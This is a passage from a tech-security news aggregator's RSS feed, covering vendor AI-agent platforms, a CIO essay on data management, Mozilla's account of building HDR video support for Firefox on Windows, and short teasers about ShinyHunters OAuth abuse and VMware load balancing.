<li>Many support the <a href="https://open-semantic-interchange.org/">Open Semantic Interchange</a>, and some brand their context layers, such as the <a href="https://www.atlassian.com/platform/teamwork-graph">Atlassian Teamwork Graph</a>, <a href="https://boomi.com/knowledge-hub-early-access/">Boomi Knowledge Hub</a>, and the <a href="https://www.sap.com/products/artificial-intelligence/knowledge-graph.html">SAP Knowledge Graph</a>.</li>



<li>Some are branding their guardrails, such as <a href="https://business.adobe.com/products/brand-intelligence.html">Adobe’s AI Brand Intelligence</a>, <a href="https://appian.com/products/platform/artificial-intelligence">Appian’s Private AI</a>, and <a href="https://www.quickbase.com/intelligence-pack/ai-control-center">Quickbase AI Control Center</a>.</li>



<li>To manage AI agents at scale, some are extending the notion of data catalogs and other governance tools to the AI domain with products such as <a href="https://boomi.com/platform/connect/">Boomi Connect</a>, <a href="https://www.sap.com/products/artificial-intelligence/ai-agent-hub.html">SAP AI Agent Hub</a>, and <a href="https://www.snowflake.com/en/product/features/horizon/">Snowflake Horizon Catalog</a>.</li>
</ul>



<p class="wp-block-paragraph">CIOs should recognize that while solution providers will compete on capabilities, the real “secret sauce” of the context layer lies in the company’s trusted data, well-defined business processes, and employee adoption of AI agents.</p>



<h2 class="wp-block-heading">Conversational user experiences and coworkers</h2>



<p class="wp-block-paragraph">AI agents use the context layer, but also tap into skills, which encode the procedures they can follow, and tools, which prescribe the actions they can take. Before AI agents are ready to pilot, their governance, including permissions, approval gates, and other guardrails, must be defined. Other capabilities to look for when defining AI agents include orchestration, testing evals, and observability.</p>



<p class="wp-block-paragraph">In 2025, many solution providers bolted on AI agents to their existing user experiences. This year, many solution providers showcased new conversational user experiences that employees can use instead of traditional ones built with forms, flows, reports, and static dashboards. Conversational user experiences are where AI agents and people come together, whether it’s human-in-the-middle or human augmentation.</p>



<p class="wp-block-paragraph">Solution providers also grouped their AI agents into assistants or coworkers. For example, <a href="https://business.adobe.com/products/cx-enterprise-coworker.html">Adobe CX Coworker</a> illustrates human augmentation, helping marketers manage campaigns with prompts and monitor their performance. SAP launched <a href="https://www.sap.com/products/artificial-intelligence/ai-assistant.html">Joule Assistants</a> across several business functions, including finance, human capital, supply chain, and customer experience. Other assistants, such as <a href="https://docs.appian.com/suite/help/26.5/appian-ai-copilot.html">Appian AI Copilot</a>, <a href="https://www.atlassian.com/software/rovo">Atlassian Rovo</a>, <a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/ai-assistant/index.html">Cisco AI Assistant</a>, <a href="https://www.nutanix.com/blog/nutanix-intelligent-virtual-agent">Nutanix NIVA</a>, and <a href="https://www.snowflake.com/en/product/snowflake-cowork/">Snowflake CoWork</a>, offer AI-first user experiences to assist different end-user types.</p>



<p class="wp-block-paragraph">CIOs should demo these <a href="https://www.infoworld.com/article/4178415/what-will-ai-first-ux-look-like.html">AI-first user experiences</a> to glimpse the future of work.</p>



<p class="wp-block-paragraph">Developers are already getting used to these experiences through code generators and vibe coding tools. Now, similar capabilities are being tailored across all business functions. CIOs should ramp up their <a href="https://www.cio.com/article/4082282/preparing-your-workforce-for-ai-agents-a-change-management-guide.html">change management programs</a> to accelerate the adoption of these AI capabilities.</p>



<p class="wp-block-paragraph">Solution providers are showcasing AI capabilities that can help CIOs <a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/">reshape their businesses</a>. But in Q2, there were only a few examples of how AI can help CIOs drive growth, evolve business models, or embed AI into customer-facing products. I expect to see a wave of further AI innovations that will go beyond productivity improvements and efficiencies and help CIOs pursue <a href="https://drive.starcio.com/2025/02/cios-drive-genai-digital-transformation/">growth-driving digital transformation strategies</a>.  </p>



<p class="wp-block-paragraph"><em>Sacolick travelled to conferences mentioned in this article as a guest of Adobe, Appian, Atlassian, Domo, Nutanix, SAP, and Snowflake. In addition, he was hired by Quickbase to speak at its conference.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The essence of data management CIOs must embrace]]></title>
<description><![CDATA[Since the advent of generative AI, the use of AI in business has shifted from something we should do to something we must do to survive. Many companies are now working to utilize AI with the aim of improving productivity and creating value.



Here, I would like to pose a question to you all once...]]></description>
<link>https://tsecurity.de/de/3667389/it-security-nachrichten/the-essence-of-data-management-cios-must-embrace/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667389/it-security-nachrichten/the-essence-of-data-management-cios-must-embrace/</guid>
<pubDate>Tue, 14 Jul 2026 11:08:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Since the advent of generative AI, the use of AI in business has shifted from something we should do to something we must do to survive. Many companies are now working to utilize AI with the aim of improving productivity and creating value.</p>



<p class="wp-block-paragraph">Here, I would like to pose a question to you all once again: “What is the fundamental factor that determines AI performance?”</p>



<p class="wp-block-paragraph">Is it the AI model? Is it the AI tool? Or is it the AI agent?</p>



<p class="wp-block-paragraph">Of course, I believe all of these are important. However, if we look at the long-term perspective, the competition among multiple companies to improve AI model performance will eventually level off, and we will eventually reach a point where every AI model is amazing!</p>



<p class="wp-block-paragraph">In that context, what I believe is the most important factor influencing AI performance is the data accumulated by companies that connects to their unique strengths.</p>



<p class="wp-block-paragraph">For example, if asked, “What do plants need to grow?” I would say “good water and light.”</p>



<p class="wp-block-paragraph">Similarly, if asked, “What do people need to thrive?” I would say, “Kind words.”</p>



<p class="wp-block-paragraph">Finally, “What does AI need to thrive?” The answer is “good data.”</p>



<p class="wp-block-paragraph">I believe that the extent to which companies can genuinely understand the importance of this extremely simple principle and implement it with unwavering dedication will determine their ability to establish a competitive advantage and achieve sustainable growth.</p>



<h2 class="wp-block-heading">AI is a mirror of data</h2>



<p class="wp-block-paragraph">As I’m sure you’re all aware, AI is by no means a magic wand. It is an entity that learns based on the data it is given and makes inferences within that scope. In other words, AI’s output depends heavily on the quality of its input data; one could say that AI is a mirror of data.</p>



<ul class="wp-block-list">
<li>If you feed it inaccurate data, it will return inaccurate results (i.e., garbage in, garbage out)</li>



<li>If you feed it biased data, it will make biased judgments</li>



<li>Insufficient data yields only shallow insights and suggestions</li>
</ul>



<p class="wp-block-paragraph">In this way, AI is not smart but rather faithful to the data. Based on this premise, it becomes clear that the essence of AI utilization lies not in which tools to use, but in what kind of high-quality data to prepare and how to utilize it.</p>



<h2 class="wp-block-heading">What is good data?</h2>



<p class="wp-block-paragraph">So, what exactly is good data?</p>



<p class="wp-block-paragraph">It goes without saying that data is useless if it is merely abundant in quantity, but on the other hand, what specific qualities must good data possess?</p>



<p class="wp-block-paragraph">Generally speaking, good data possesses at least the following elements.</p>



<ul class="wp-block-list">
<li><strong>Accuracy:</strong> Data containing many errors or noise will skew conclusions, no matter how advanced the analysis. It is important to minimize sensor errors, input mistakes and duplicates.</li>



<li><strong>Completeness:</strong> Are any required fields missing, and are there too many missing values? For example, if customer data is missing information such as age, region or gender, it becomes difficult to perform meaningful analysis.</li>



<li><strong>Consistency:</strong> Is data with the same meaning mixed in different formats (e.g., date formats, units, variations in notation)? This is particularly important for system integration and long-term data.</li>



<li><strong>Timeliness:</strong> No matter how accurate it is, data that is too old may not be useful for decision-making. Whether real-time data is required or historical data is sufficient depends on the use case, but it is important that the data has the appropriate freshness for the purpose.</li>



<li><strong>Relevance:</strong> If there is a large amount of data unrelated to the analysis objective, it becomes noise and leads to incorrect judgments. It is necessary to clearly define what the data is used for and ensure the data is appropriate for that purpose.</li>



<li><strong>Reliability: The data’s source and collection method must be</strong> clear, ensuring reliability and reproducibility. Data with an unknown source or that is a black box cannot be verified later.</li>
</ul>



<p class="wp-block-paragraph">In summary, good data is data that is accurate, has few gaps, is consistent in meaning and notation, is collected at the appropriate time, is suitable for the purpose and comes from a reliable source.</p>



<p class="wp-block-paragraph">Only when the quality of this good data is guaranteed can AI produce valuable outputs. Conversely, introducing AI with unorganized data will not yield the expected results. Many complaints, such as “We implemented AI but it’s unusable” or “The AI’s accuracy isn’t improving stem from data issues.”</p>



<h2 class="wp-block-heading">Data does not organize itself naturally</h2>



<p class="wp-block-paragraph">The key point here is that good data does not arise naturally. On the contrary, if left unattended, data will inevitably deteriorate.</p>



<ul class="wp-block-list">
<li>Rules become inconsistent depending on who entered the data and when</li>



<li>Multiple instances of data with the same meaning exist</li>



<li>Outdated data is scattered and left unattended</li>



<li>Data becomes siloed by department</li>
</ul>



<p class="wp-block-paragraph">These conditions are likely common in many companies.</p>



<p class="wp-block-paragraph">Below is an overview of our company’s <a href="https://www.kepco.co.jp/english/corporate/list/report/">data management framework</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/overview-of-data-management-at-kansai-electric-power-company.png?w=1024" alt="Overview of data management at Kansai Electric Power Company" class="wp-image-4196318" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p class="wp-block-paragraph">Broadly speaking, it consists of data governance — covering roles and structures, risk management and evaluation — and data management, which encompasses data utilization cycle management and data utilization support services. Within this framework, data utilization cycle management involves:</p>



<ul class="wp-block-list">
<li><strong>Needs management:</strong> We clarify the purpose and needs by asking, “What is the data being used for?” and “For whom, and in what way, does this data create value?”</li>



<li><strong>Collection:</strong> We gather the necessary data based on the defined objectives. We design the process to determine what data is required (internal/external), the level of detail and frequency of collection, and how to ensure data quality.</li>



<li><strong>Processing: </strong>We enhance the quality and prepare the data for use. This includes cleansing (correcting errors and missing values), standardizing formats, deduplicating and integrating data, processing structured and unstructured data separately, and assigning business and operational meaning to the data.</li>



<li><strong>Storage:</strong> We ensure the data is available to the right people at the right time. This involves storing data in databases or data lakes, implementing security and access controls, and managing metadata (ensuring the data is clearly identifiable).</li>



<li><strong>Utilization:</strong> This is the most critical step. The purpose of data is not merely analysis but driving action. We generate value from the data through visualization (dashboards), analysis (statistical processing, BI, AutoML, AI) and integration into business operations (automation and decision support).</li>



<li><strong>Disposal: </strong>We properly dispose of data that is no longer needed. Simply holding data can itself pose risks, such as managing retention periods, complying with laws and governance requirements, and mitigating security risks. That is why the principle of not holding data that is not used is so important.</li>
</ul>



<p class="wp-block-paragraph">Data management is not a one-time effort; it is an ongoing initiative that requires continuous maintenance and improvement.</p>



<p class="wp-block-paragraph">The CIO must embed data management as a system within the organization and continue to implement it until it becomes firmly established.</p>



<h2 class="wp-block-heading">Data management is not just the IT department’s job</h2>



<p class="wp-block-paragraph">Another important point is that data management is not just the IT department’s job.</p>



<p class="wp-block-paragraph">Data is fundamentally generated within day-to-day operations on the front lines. Therefore:</p>



<ul class="wp-block-list">
<li>Who determines the meaning and definition of data</li>



<li>How should input rules be standardized?</li>



<li>How do we ensure data quality?</li>
</ul>



<p class="wp-block-paragraph">are, in essence, operational issues, business issues and management issues.</p>



<p class="wp-block-paragraph">The latest Digital Skills Standard ver. 2.0, published by the Ministry of Economy, Trade and Industry in April 2026, defines the following three roles within the data management category:</p>



<ul class="wp-block-list">
<li><strong>Data steward:</strong> Based on business domain knowledge, this role is responsible for operations aimed at ensuring data quality, reliability and security, as well as for promoting the adoption and establishment of data management within business divisions and frontline organizations, and for fostering data utilization. In short, they are the data quality manager and data utilization promoter.</li>



<li><strong>Data engineer: </strong>This role involves understanding the current state of data and supporting the organization’s continuous data utilization through data preparation and preprocessing in processes such as collection, integration, processing and provision, as well as the design and implementation of data pipelines. In essence, they are the implementers and operators who drive data.</li>



<li><strong>Data architect:</strong> This role involves taking a bird’s-eye view of the data structure, flow and utilization methods across the entire organization and business. By designing and continuously reviewing data architecture that encompasses the entire data lifecycle in alignment with business strategy, they ensure the successful integration of company-wide data utilization and governance—essentially serving as the overall designer of data.</li>
</ul>



<p class="wp-block-paragraph">The CIO is not merely responsible for establishing data storage and analysis infrastructure; they are also tasked with appropriately assigning personnel to these three roles within the company and establishing cross-departmental, company-wide tools and rules to connect data with management, business operations and daily tasks.</p>



<h2 class="wp-block-heading">Ultimately, the success of data utilization depends on organizational culture</h2>



<p class="wp-block-paragraph">On the other hand, no matter how much progress is made in staffing, infrastructure, tools and rulemaking, data will not be utilized unless there is an organizational culture that actively drives management, business and operations based on data.</p>



<ul class="wp-block-list">
<li>The purpose of data entry is not understood</li>



<li>Data is optimized solely for the department’s own operations</li>



<li>Decision-making based on data is not valued</li>
</ul>



<p class="wp-block-paragraph">In such a situation, no matter how well the systems are set up, they will become mere formalities.</p>



<p class="wp-block-paragraph">In contrast, in organizations where data utilization is advanced:</p>



<ul class="wp-block-list">
<li>Discussions are based on data</li>



<li>Formulate hypotheses and verify them with data</li>



<li>And continuously improve based on data</li>
</ul>



<p class="wp-block-paragraph">These actions occur naturally.</p>



<p class="wp-block-paragraph">In other words, the essence of data management ultimately lies in creating an organizational culture that assumes the effective use of data.</p>



<p class="wp-block-paragraph">Data management cannot be achieved overnight. That is precisely why it is important to start small and build on your successes.</p>



<ul class="wp-block-list">
<li>Organize data for specific tasks and achieve results through the use of AI</li>



<li>Rolling out successful practices</li>



<li>Gradually Expand the Scope</li>
</ul>



<p class="wp-block-paragraph">By repeating this cycle, the importance of data will permeate the entire organization.</p>



<h2 class="wp-block-heading">The role expected of a CIO in the AI era</h2>



<p class="wp-block-paragraph">In the AI era, the role expected of a CIO has changed significantly.</p>



<p class="wp-block-paragraph">Traditionally:</p>



<ul class="wp-block-list">
<li>Ensuring the stable operation of systems</li>



<li>And optimizing costs</li>
</ul>



<p class="wp-block-paragraph">However, moving forward:</p>



<ul class="wp-block-list">
<li>We will view data as an asset and maximize its value</li>



<li>Developing the data infrastructure, tools and rules that underpin AI adoption, and advancing personnel allocation and development</li>



<li>And fostering an organizational culture that embraces data utilization —roles that are more directly linked to business management</li>
</ul>



<p class="wp-block-paragraph">In other words, the CIO must evolve into the person responsible for creating value from data.</p>



<h2 class="wp-block-heading">Data is the source of competitive advantage</h2>



<p class="wp-block-paragraph">In the coming era, the use of AI will be a given. What will set companies apart is not whether they use AI, but what data they possess.</p>



<p class="wp-block-paragraph">Data is the accumulation of a company’s past strengths and the source of future value creation. And its quality is determined by daily operations and the nature of the organization.</p>



<ul class="wp-block-list">
<li>AI grows by being fed good data</li>



<li>And companies grow through that AI</li>
</ul>



<p class="wp-block-paragraph">Taking this simple principle as our starting point, we must place data management at the core of our business strategy. Isn’t that the shortest route to sustainable growth in the AI era?</p>



<p class="wp-block-paragraph">CIOs are called upon to lead the way in making this a reality.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla GFX: HDR video in Firefox for Windows tech retrospective]]></title>
<description><![CDATA[HDR video is coming to Firefox for Windows users (and has been available for some time on macOS).  This blog post explains how we developed the feature and gives a retrospective on the technical choices we made.



A primer on video playback for the web:




Video file demux and decode: A video s...]]></description>
<link>https://tsecurity.de/de/3666879/tools/mozilla-gfx-hdr-video-in-firefox-for-windows-tech-retrospective/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666879/tools/mozilla-gfx-hdr-video-in-firefox-for-windows-tech-retrospective/</guid>
<pubDate>Tue, 14 Jul 2026 07:08:30 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="wp-block-paragraph">HDR video is coming to Firefox for Windows users (and has been available for some time on macOS).  This blog post explains how we developed the feature and gives a retrospective on the technical choices we made.</p>



<p class="wp-block-paragraph">A primer on video playback for the web:</p>



<ul class="wp-block-list">
<li><strong>Video file demux and decode</strong>: A video stream generally consists of parallel image and audio streams, along with captions, HDR scene metadata, and the like. “Container” formats like MP4 or MKV specify how these streams are combined, or multiplexed, into a single byte stream for transmission. On receipt, Firefox needs to divide that byte stream back into the individual media streams; this is de-multiplexing or “demuxing”. Then Firefox must uncompress the data to get images, audio samples, and so on. Firefox’s media team provides the demuxers, and pulls in appropriate codecs to decode them. We prefer using hardware video decoders if they work reasonably well. Video decompression usually produces roughly a YUV 4:2:0 image in <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/recommended-8-bit-yuv-formats-for-video-rendering">NV12 for SDR</a> or <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/10-bit-and-16-bit-yuv-video-formats">P010 for HDR</a>. (If you visit <strong>about:support</strong> in Firefox, and search for <strong>Codec Support Information</strong> (or one of the codec names like <strong>AV1</strong>), you can see a whole feature matrix of support details for which codecs are hardware and software on your system.)</li>



<li><strong>Gecko displaylist building</strong>: Given a demultiplexed, uncompressed frame of video, Gecko displaylist building incorporates it into a video element in the displaylist being sent to WebRender. If the frame was decoded in hardware, it is generally represented by a texture in GPU memory. Or, if it was decoded in software, then it is represented by a memory mapping holding some raw pixel data in system memory shared with Firefox’s media decoder process.</li>



<li><strong>WebRender</strong>: Given the video element in the displaylist, WebRender decides whether to promote it to a desktop compositor overlay, or whether it must instead be rendered using a pathway more like an ordinary HTML element. A compositor overlay is faster and uses less power; on Windows this uses DWM with the <a href="https://learn.microsoft.com/en-us/windows/win32/api/_directcomp/">DirectComposition API</a>, which manages a graph of <a href="https://learn.microsoft.com/en-us/windows/win32/api/dcomp/nn-dcomp-idcompositionvisual">visuals</a>. But if complex CSS is involved (rounded corners, blur filters, or similar features), Firefox must use WebRender’s ordinary rendering pathway. Currently the latter is not HDR capable, so Firefox favors the desktop compositor overlay for animated elements such as video and canvas.</li>
</ul>



<p class="wp-block-paragraph">As we began designing Firefox’s HDR support, we had to lay out some assumptions and found many complications:</p>



<ul class="wp-block-list">
<li>Initially, we had hoped that on a modern system, <a href="https://en.wikipedia.org/wiki/Rec._2100">BT2100</a> HDR videos could be displayed on Windows by simply sending them to DirectComposition.
<ul class="wp-block-list">
<li>In theory, the Desktop Window Manager (DWM) honors the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgi1_4/nn-dxgi1_4-idxgiswapchain3">DXGISwapChain3</a>::<a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgi1_4/nf-dxgi1_4-idxgiswapchain3-setcolorspace1">SetColorSpace1</a> method which should let us request either <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgicommon/ne-dxgicommon-dxgi_color_space_type">DXGI_COLOR_SPACE_YCBCR_STUDIO_G2084_LEFT_P2020</a> or <a href="https://learn.microsoft.com/en-us/windows/win32/api/dxgicommon/ne-dxgicommon-dxgi_color_space_type">DXGI_COLOR_SPACE_YCBCR_STUDIO_GHLG_LEFT_P2020</a>. The former refers to SMPTE 2084, more commonly called PQ, the <a href="https://en.wikipedia.org/wiki/Perceptual_quantizer">Perceptual Quantizer</a> function and the latter is ARIB-STD-B67  also known as HLG, the <a href="https://en.wikipedia.org/wiki/Hybrid_log%E2%80%93gamma">Hybrid Log Gamma</a> function, most commonly used on HDR TV broadcasts.</li>



<li>Unfortunately, this was a dead end. In testing with a mocked up <a href="https://github.com/FirefoxGraphics/compositor_colortest/tree/main">compositor test app</a>, calling SetColorSpace1 with this value seems to be ignored on P010 (at least in testing on AMD), so it incorrectly displays BT2100 PQ video as if it were BT709, which makes the video dull and muddy, since BT709 is a narrower gamut than BT2020, and the BT1886 transfer function used by BT709 is very different from PQ defined by BT2100. SetColorSpace1 may work on other vendors with P010, so it may be a valid optimization, but we were looking for a universal solution.</li>



<li>For the future, Windows 11 23H2 has added a new interface called IDCompositionTexture which may serve our purposes better; from what we have been told, it is universally supported for all formats and color spaces. We haven’t used it for video so far, but it’s an interesting future direction.</li>
</ul>
</li>



<li>As noted above, HDR videos must use a desktop compositor overlay. HDR video uses the BT2100 PQ colorspace with an RGB10A2 format, while WebRender can only work with images in the sRGB colorspace (appropriate for standard-dynamic-range BT709 video).
<ul class="wp-block-list">
<li>Until HDR came along, Gecko and WebRender only used desktop compositor overlays as a power/performance optimization. With HDR, overlays become a necessity as the pixel format and color space differ from classic sRGB.</li>



<li>Fortunately, HDR videos tend to be shown without particularly fancy CSS rendering such as clip masks and rounded corners, which would require WebRender to perform further copies. Technically, DirectComposition does support all of those features, but Firefox doesn’t use that functionality much.</li>



<li>In the future, we expect to upgrade WebRender for HDR rendering, allowing us to deal with complex cases like clip masks or blur filters on video elements.</li>
</ul>
</li>



<li>We considered whether we could use VideoProcessorBlt, or whether we should write our own shader instead.
<ul class="wp-block-list">
<li>In favor of VideoProcessorBlt:
<ul class="wp-block-list">
<li>It uses less power on GPUs that have a video processor unit.</li>



<li>We discovered in testing (using <a href="https://learn.microsoft.com/en-us/windows/win32/api/d3d11_1/nf-d3d11_1-id3d11videoprocessorenumerator1-checkvideoprocessorformatconversion">CheckVideoProcessorFormatConversion</a>) that while many modern GPUs support one of the needed conversions (P010 PQ -&gt; RGB10 PQ), few support the ones we need for HLG videos (P010 HLG -&gt; RGB10 PQ).</li>



<li>The ‘video-dynamic-range’ query used on the web is not fine-grained enough to be able to say “the web browser can display PQ video but not HLG video”, so if we went with VideoProcessorBlt as a required feature, only about 20% of HDR desktop users would be able to use the feature.</li>



<li>In the future, we could explore using VideoProcessorBlit to save power on hardware that supports the conversions we need. But other web browsers are not using this functionality, so there may be more issues we haven’t found yet.</li>
</ul>
</li>



<li>In favor of writing our own shader with all of the features:
<ul class="wp-block-list">
<li>This would work consistently on all vendors – nothing special here.</li>



<li>This would look the same on all vendors, regardless of hardware capabilities. This is generally the aim of web standards.</li>



<li>This would support anything we want it to. HDR tonemapping can be implemented. Video orientation can be implemented (for videos recorded on phones which may be rotated 90, 180 or 270 degrees). We can support any kind of YUV-&gt;RGB conversion with a color matrix (even weird legacy formats like GBR 4:2:0).  We can support conversion between color primaries (e.g. BT2020-&gt;BT709).  We can convert to linear color (for scRGB using RGBA16F) or any EOTF we want (notably BT2100 PQ with RGB10A2, for our use-case).</li>
</ul>
</li>



<li>In the end we went with the shader after a significant period of time experimenting with VideoProcessorBlt in our Nightly releases.</li>
</ul>
</li>



<li>There is a very large amount of graphics code in Gecko and WebRender that needs to be upgraded for HDR.
<ul class="wp-block-list">
<li>We decided that the most important code paths to upgrade first are the ones for regular video playback and DRM-protected video playback, and later canvas video import (Canvas2D, WebGL, WebGPU) which will require upgrading canvas for HDR first – another big project.</li>



<li>We had to upgrade several dozen structs to carry the transfer function for video data, as previously all code assumed video used BT1886 EOTF.</li>
</ul>
</li>



<li>We hope we can avoid tone mapping HDR content when viewed on HDR displays.
<ul class="wp-block-list">
<li>It’s reasonable to expect that most displays going forward will be HDR displays (partly because of marketing momentum, partly because displays are made by a very finite set of manufacturers who are all making HDR display panels), and eventually tone mapping may become unnecessary on the web.</li>



<li>For the short-term we will have to apply a tone mapping effect when HDR content is viewed on SDR displays, likely using  ‘Reinhard tonemapping’ which refers to the widely available paper <a href="https://doi.org/10.1145/566654.566575">Photographic Tone Reproduction for Digital Images</a> by Erik Reinhard et al, and configuring it for a fixed brightness ratio of 400 cd/m^2 -&gt; 100 cd/m^2 when used on SDR displays, and see if that fits all HDR content on the web well enough for a good user experience – and if it does not, we will iterate based on feedback from users on Firefox Nightly.</li>



<li>We are hoping that we will never have to apply tonemapping for HDR content on HDR displays, there are multiple factors in this decision:
<ul class="wp-block-list">
<li>Varying the brightness limit would make it a significant fingerprinting vector if not handled very carefully if the script can inspect pixels or parameters related to that.  There are ways to mitigate this but they are all awkward restrictions to impose, and queries would have to get a different answer than what the rendering is using.</li>



<li>Phones and laptops with light sensors may vary the reference brightness in real time, and this changes the maximum displayable ratio (aka HDR headroom) every refresh, which is also a major battery drain if we keep redrawing all of the time.</li>



<li>Documents composed of multiple images (a gallery or some form of art composition) would apply different tonemapping to each image if the brightest pixel in each image is different brightness).  We’d have to do something about that to make it controllable via CSS.</li>



<li>In general the detailed parts of an image are within a certain brightness band – see <a href="https://www.yedlin.net/DebunkingHDR/">Debunking HDR</a> for a detailed lecture on film grading and why you would not have significant difference in brightness between scene elements.</li>



<li>User feedback so far has indicated that not applying tonemapping has given them a better viewing experience on some videos.</li>
</ul>
</li>
</ul>
</li>



<li>WebRTC is implemented using a library, common to all web browsers, which has limited support for HDR.
<ul class="wp-block-list">
<li>While we didn’t prioritize this for an initial feature launch, we are looking at how to implement HDR support properly in libwebrtc. This is in the early assessment phase but we know this is wanted for a couple of use-cases, like video calls for meetings, or game streaming with friends watching.</li>
</ul>
</li>
</ul>



<p class="wp-block-paragraph">In general, one of the biggest challenges in working on graphics code in a web browser is a lack of documentation for how to best use features like video playback and desktop compositing in the context of a web browser (e.g. multiple processes, sandboxing, shared memory, sharing external textures, etc). This parallels the rarity of graphics engineers with such experience. Building new features in this space requires a lot of research (and a lot of trial and error). The solution you end up with may not look at all like the one you initially imagined.</p>



<p class="wp-block-paragraph">On behalf of the graphics team at Mozilla, I want to thank the people who use Firefox Nightly regularly and file bug reports when things aren’t working the way they want. Comments on <a href="https://mozillagfx.wordpress.com/2026/01/16/experimental-high-dynamic-range-video-playback-on-windows-in-firefox-nightly-148/">Experimental High Dynamic Range video playback on Windows in Firefox Nightly 148</a>, <a href="https://connect.mozilla.org/">Mozilla Connect</a>, and <a href="https://bugzilla.mozilla.org/">Bugzilla</a> bug reports have guided us to focus on the use-cases that matter to people using Firefox. When we succeed, it’s a great feeling.</p>



<p class="wp-block-paragraph">We’re working on extending HDR support to photos, apps/games and general web content.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending SaaS-based applications against ShinyHunters OAuth abuse]]></title>
<description><![CDATA[Microsoft Threat Intelligence identified threat actor activity with overlapping tradecraft commonly associated with ShinyHunters, including voice phishing (vishing), supply-chain compromise, and misconfigured guest access targeting SaaS-based applications. The post Defending SaaS-based applicatio...]]></description>
<link>https://tsecurity.de/de/3666587/it-security-nachrichten/defending-saas-based-applications-against-shinyhunters-oauth-abuse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666587/it-security-nachrichten/defending-saas-based-applications-against-shinyhunters-oauth-abuse/</guid>
<pubDate>Tue, 14 Jul 2026 01:37:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence identified threat actor activity with overlapping tradecraft commonly associated with ShinyHunters, including voice phishing (vishing), supply-chain compromise, and misconfigured guest access targeting SaaS-based applications. The post Defending SaaS-based applications against ShinyHunters OAuth abuse appeared first on Microsoft…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/defending-saas-based-applications-against-shinyhunters-oauth-abuse/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/defending-saas-based-applications-against-shinyhunters-oauth-abuse/">Defending SaaS-based applications against ShinyHunters OAuth abuse</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Load Balancing in vSphere 9.0 and VMware Cloud Foundation 9.0]]></title>
<description><![CDATA[If you’re managing Kubernetes alongside traditional virtual machines, vSphere Supervisor in vSphere 9.0 and VMware Cloud Foundation (VCF) 9.0 serves as your unified control plane. But when it comes to setting up the infrastructure, one question always comes up from teams designing these environme...]]></description>
<link>https://tsecurity.de/de/3666562/downloads/load-balancing-in-vsphere-90-and-vmware-cloud-foundation-90/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666562/downloads/load-balancing-in-vsphere-90-and-vmware-cloud-foundation-90/</guid>
<pubDate>Tue, 14 Jul 2026 01:01:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="154" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/Networking-DataCenter.jpeg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/Networking-DataCenter.jpeg 441w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/Networking-DataCenter.jpeg?resize=300,154 300w" sizes="(max-width: 300px) 100vw, 300px"></div>
<p>If you’re managing Kubernetes alongside traditional virtual machines, vSphere Supervisor in vSphere 9.0 and VMware Cloud Foundation (VCF) 9.0 serves as your unified control plane. But when it comes to setting up the infrastructure, one question always comes up from teams designing these environments:  “Which load balancers are supported, and how do I choose the … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/13/choosing-the-right-load-balancer-for-vsphere-supervisor-in-vsphere-9-0-and-vmware-cloud-foundation-9-0/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/13/choosing-the-right-load-balancer-for-vsphere-supervisor-in-vsphere-9-0-and-vmware-cloud-foundation-9-0/">Load Balancing in vSphere 9.0 and VMware Cloud Foundation 9.0</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending SaaS-based applications against ShinyHunters OAuth abuse]]></title>
<description><![CDATA[Microsoft Threat Intelligence identified threat actor activity with overlapping tradecraft commonly associated with ShinyHunters, including voice phishing (vishing), supply-chain compromise, and misconfigured guest access targeting SaaS-based applications.
The post Defending SaaS-based applicatio...]]></description>
<link>https://tsecurity.de/de/3666555/it-security-nachrichten/defending-saas-based-applications-against-shinyhunters-oauth-abuse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666555/it-security-nachrichten/defending-saas-based-applications-against-shinyhunters-oauth-abuse/</guid>
